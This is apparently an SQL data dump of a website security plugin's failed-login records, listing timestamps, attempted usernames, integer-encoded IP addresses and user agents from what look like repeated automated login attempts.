(104032, 1500215772.586173, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1728410209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104033, 1500216217.614990, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3316022973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104034, 1500216221.012182, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3316022973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104035, 1500219178.058045, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.85.38 (KHTML, like Gecko) Chrome/57.4.9761.4033 Safari/534.56 OPR/44.5.0484.6756'),
(104036, 1500219574.941398, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2565749885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104037, 1500219576.542395, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2565749885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104038, 1500224743.822704, 1, 'loginFailValidUsername', 'julie', 2, 584188065, ''),
(104039, 1500226922.320648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3153775560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104040, 1500226923.636283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3153775560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104041, 1500231366.100578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498190932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104042, 1500231367.149272, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498190932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104043, 1500237976.944825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 999430761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104044, 1500237979.212023, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 999430761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104045, 1500239419.124303, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065601545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104046, 1500239421.986335, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065601545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104047, 1500242924.224457, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104048, 1500242927.134512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104049, 1500244976.938946, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(104050, 1500250374.515837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3191277877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104051, 1500250377.617445, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3191277877, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104052, 1500252402.582817, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3143998148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104053, 1500252404.025986, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3143998148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104054, 1500253099.197705, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549953834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104055, 1500253100.432921, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549953834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104056, 1500254720.679948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3044121415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104057, 1500261311.491772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3172634165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104058, 1500261313.382723, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3172634165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104059, 1500262904.379880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976064904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104060, 1500262905.888822, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976064904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104061, 1500264744.904461, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887841908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104062, 1500268296.876012, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201981880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104063, 1500268298.397193, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201981880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104064, 1500270082.689826, 1, 'loginFailValidUsername', 'julie', 2, 585330554, ''),
(104065, 1500270994.878621, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.07.54 (KHTML, like Gecko) Chrome/57.5.0510.4248 Safari/534.47'),
(104066, 1500271105.713214, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2002609969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104067, 1500271110.595954, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2002609969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104068, 1500278723.890840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1677850360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104069, 1500278725.052621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1677850360, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104070, 1500279656.562775, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3641833641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104071, 1500279657.824465, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3641833641, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104072, 1500280257.987741, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1238881600, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104073, 1500280259.124490, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1238881600, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104074, 1500280605.124328, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1567078369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104075, 1500280606.114925, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1567078369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104076, 1500280794.997943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3121494397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104077, 1500280796.836435, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3121494397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104078, 1500281272.232564, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90616773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104079, 1500281273.298684, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90616773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104080, 1500281762.131788, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539428482, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104081, 1500283512.520646, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023279659, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104082, 1500283514.597126, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023279659, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104083, 1500284428.042579, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702634471, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104084, 1500284429.205862, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702634471, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104085, 1500284965.376208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3647166437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104086, 1500284966.756071, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3647166437, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104087, 1500287265.747147, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2934048583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104088, 1500287267.266984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2934048583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104089, 1500287387.245600, 1, 'loginFailValidUsername', 'admin', 1, 406012892, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104090, 1500287389.011607, 1, 'loginFailValidUsername', 'admin', 1, 3661372542, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104091, 1500287389.525549, 1, 'loginFailValidUsername', 'admin', 1, 3363691618, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104092, 1500287389.925735, 1, 'loginFailValidUsername', 'admin', 1, 1600667056, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104093, 1500287741.100191, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768723942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104094, 1500287742.130755, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1768723942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104095, 1500288499.213331, 1, 'loginFailValidUsername', 'admin', 1, 989113730, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104096, 1500289511.367873, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1776516961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104097, 1500289512.916623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1776516961, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104098, 1500291333.631647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1015060933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104099, 1500291335.021899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1015060933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104100, 1500297109.502132, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(104101, 1500297337.709285, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3303032786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104102, 1500297340.243670, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3303032786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104103, 1500298923.572929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503318595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104104, 1500298924.585796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503318595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104105, 1500299039.416750, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1334918886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104106, 1500299040.396828, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1334918886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104107, 1500299554.925159, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1843600622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104108, 1500299556.202867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1843600622, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104109, 1500302706.900357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1347764095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104110, 1500302708.024956, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1347764095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104111, 1500303701.445051, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1570079581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104112, 1500303703.142249, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1570079581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104113, 1500306310.130996, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050256701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104114, 1500306311.746578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050256701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104115, 1500308583.327764, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1518783841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104116, 1500308584.469380, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1518783841, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104117, 1500309765.419300, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2973166485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104118, 1500309767.003716, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2973166485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104119, 1500309962.255546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424761973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104120, 1500309963.279179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424761973, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104121, 1500310297.624932, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1309579320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104122, 1500310298.638926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1309579320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104123, 1500310605.674102, 1, 'loginFailValidUsername', 'julie', 2, 874738092, ''),
(104124, 1500314583.869415, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729078788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104125, 1500316805.526597, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1370255902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104126, 1500316807.031154, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1370255902, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104127, 1500317137.174677, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356027048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104128, 1500317141.745605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356027048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104129, 1500320577.137675, 1, 'loginFailValidUsername', 'julie', 2, 911647748, ''),
(104130, 1500323287.347939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981497232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104131, 1500323289.017497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2981497232, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104132, 1500323355.306369, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.84.31 (KHTML, like Gecko) Version/5.2.7 Safari/530.76'),
(104133, 1500323669.791723, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443531046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104134, 1500323671.690691, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1443531046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104135, 1500326083.772927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3164695660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104136, 1500333062.012636, 1, 'loginFailValidUsername', 'julie', 2, 874738092, ''),
(104137, 1500333219.666855, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 94241165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104138, 1500333226.238740, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 94241165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104139, 1500336190.930708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833095966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104140, 1500336192.013734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833095966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104141, 1500336641.180615, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549964316, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104142, 1500336642.369132, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549964316, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104143, 1500338407.316794, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3138378692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104144, 1500338408.945732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3138378692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104145, 1500340044.025994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3292600061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104146, 1500340045.575188, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3292600061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104147, 1500342969.114473, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3701254369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104148, 1500342970.911621, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3701254369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104149, 1500346158.926443, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1855096721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104150, 1500346278.443184, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1237999338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104151, 1500348963.777738, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147820056, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104152, 1500348968.180343, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147820056, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104153, 1500350252.906197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3091977507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104154, 1500350254.421018, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3091977507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104155, 1500356771.728656, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1295071211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104156, 1500356772.802874, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1295071211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104157, 1500356851.851447, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2119415321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104158, 1500356853.270304, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2119415321, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104159, 1500357164.319460, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1386744982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104160, 1500357165.302938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1386744982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104161, 1500357616.524217, 1, 'loginFailValidUsername', 'admin', 1, 598145435, ''),
(104162, 1500363061.936690, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307817850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104163, 1500363063.634922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307817850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104164, 1500363287.550571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892314052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104165, 1500363289.262796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892314052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104166, 1500365654.083218, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1422229100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104167, 1500366335.119333, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1675806400, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104168, 1500366336.239731, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1675806400, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104169, 1500366366.795677, 1, 'loginFailValidUsername', 'admin', 1, 885815617, ''),
(104170, 1500370027.152613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3144166239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104171, 1500370029.040774, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3144166239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104172, 1500370205.941696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831962742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104173, 1500370207.882396, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831962742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104174, 1500371201.852307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327110560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104175, 1500371202.885237, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327110560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104176, 1500373329.811727, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_45_92) AppleWebKit/532.86.33 (KHTML, like Gecko) Chrome/56.3.7455.2183 Safari/533.25 Edge/36.10044'),
(104177, 1500376266.423398, 1, 'loginFailValidUsername', 'admin', 1, 598069797, ''),
(104178, 1500381656.427769, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978650888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
